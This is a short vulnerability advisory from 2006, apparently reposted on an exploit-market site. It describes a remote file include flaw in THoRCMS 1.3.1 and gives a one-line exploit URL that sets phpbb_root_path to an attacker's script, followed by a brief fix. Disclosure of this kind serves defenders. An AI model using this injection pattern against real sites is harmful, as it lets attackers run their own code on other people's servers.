[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability

Author
Kw3[R]Ln
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-546
Category
web applications
Date add
24-06-2006
Platform
unsorted
====================================================================
THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
====================================================================




--------------------------------------------------------------------------- 
THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : THoRCMS
version : latest version [ 1.3.1 ]
Description: A CMS/Portal for phpBB
URL : http://www.phpbbhacks.com/download/2349

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]


---------------------------------------------------------------------------

Solution :
~~~~~~~~~~

declare variabel $phpbb_root_path


-------------------------------- [ EOF] ----------------------------------



#  0day.today [2024-12-24]  #